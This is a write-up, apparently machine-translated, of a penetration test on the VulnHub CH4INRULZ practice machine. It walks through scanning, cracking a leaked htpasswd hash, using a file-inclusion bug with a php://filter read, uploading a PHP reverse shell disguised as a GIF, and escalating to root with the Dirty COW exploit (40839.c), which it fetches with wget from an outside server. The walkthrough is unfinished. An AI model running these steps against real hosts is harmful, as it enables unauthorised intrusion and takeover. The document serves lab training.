vulnhub-CH4INRULZ penetration test

Environment construction

Vulnhub official website https://download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova
After downloading, drag it directly. If it fails, drag it again. After successful deployment, it will be a login interface

thinking

nmap scans out the address and gets four ports. 80 and 8011 open the Web service. After scanning the file, it is found that index.html.bak uses john blasting to get the account password, and it is found that the / development Directory status code is 401, which requires password authentication. After entering, it is found that it is a file upload function. Go to port 8011 and find that the file contains vulnerabilities. A combination of the two. After finding the file upload path, use the PHP pseudo protocol to get the source code of uploader.php. After knowing the file upload path, you can rebound a shell with the file. Here we also use some of kali's own rebound shell scripts. After getting the shell, start to raise the rights: check the kernel version and directly raise the rights. Before using 40349.c, I also used 40847.cpp and 40838.c scripts to raise the rights, but failed. 40847.cpp needs g + + when compiling, but there is no g + + in the target. If it is installed, it needs permissions. 40838.c compiled successfully and executed, but it seems useless. If you pop back a picture, it's gone.

Penetration test

kali address 192.168.64.255, scan all addresses in the same segment, filter and select
Tool usage (nmap MSF CS docker goby in kali linux)

nmap -sP 192.168.64.0/24 		//-SP: Ping scan (no port scan)
nmap -sV 192.168.64.130  		//-sV: the detailed version of the service can be displayed


There are two web ports 80 and 8011, ftp port 21, ssh port 22, and access port 80

I didn't find anything useful. Sweep it with the imperial sword

Then use dirsearch to scan

Each visit is basically noting here, yet!

Visit / index.html.bak, download and open the discovery notes. Here should be the account password

<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->

john blasted here John the Ripper password cracker(Refer to password cracking - John the Ripper uses)

cd /home/kali/Desktop/vulnhub/john-1.8.0/src
make clean linux-x86-64  		//Select according to your own system version
cd ../run
vim shadow.txt 					// frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
./john shadow.txt



Getting the password is also frank!!!, but what's the use of getting the account password here? In fact, there will be a login box when you visit / development / here, and the login success will be displayed


Visit / development/uploader to find the upload box

Here I try to upload pictures and find that the upload is successful, but I don't give a path or other tips

Try to upload php in one sentence and find that restrictions are made. The picture header and suffix will be reviewed

Although the upload was successful, I don't know the path here, so there's no place to do it. So first go to the web page of port 8011 and scan it with dirsearch

Visit: 8011/api found 4 PHP pages, but only files_api.php can access them


When prompted to pass the file parameter, try to access / etc/passwd here

:8011/api/files_api.php?file=/etc/passwd

WRONG INPUT!! attempt to POST a parameter and find a successful read
Since any file can be read, we can read upload.php to get the file upload path, but we don't know the file path of port 80 here. We can get it through Apache's configuration file / etc / apache2 / sites enabled / 000 default

GET: :8011/api/files_api.php
POST: file=/etc/apache2/sites-enabled/000-default

After knowing the file path of upload.php, you can read it directly. You need to read the contents of uploader.php in combination with PHP pseudo protocol

file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php


base64 decryption Get the source code

<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?

It is found that the picture is under / FRANKuploads /. Just now we uploaded a sentence Trojan horse. Here we directly include the file and upload the parameters


Now that you can include and execute successfully, try to rebound the shell again. Here, use the php-reverse-shell.php file that comes with kali, located in

/usr/share/webshells/php/php-reverse-shell.php

Modify the IP address to kali's address and the listening port opened by kali, add GIF89a, and change the picture header to GIF suffix for uploading


kali listens to port 1234 and uses 8011/api/files_api.php for file inclusion. Here, I can't connect it repeatedly with kali, but I can connect it on the local machine


After you have the WWW Data permission here, stabilize bash

python -c 'import pty;pty.spawn("/bin/bash")'

Continue to raise rights. Check the kernel version information, and you can directly raise rights with dirty cattle

Copy 40839 files to the desktop and start an http service (you can also find a link already placed on the Internet)

cp /usr/share/exploitdb/exploits/linux/local/40839.c ~/Desktop 
python -m SimpleHTTPServer 8848

Let the target download 40839.cpp file from kali (it's still not available here, so I throw it on the server), and prompt that it can't be written, and the permission is not enough

View permissions for each directory

We download 40839.cpp to the / tmp directory

 wget http://vulhub.yster.live/40839.c

Compile and execute, get the user name firepart and enter the new password

 gcc -pthread 40839.c -o dirty -lcrypt



Unfinished

Tags: Vulnhub

Posted on Wed, 17 Nov 2021 01:06:34 -0500 by VagabondKites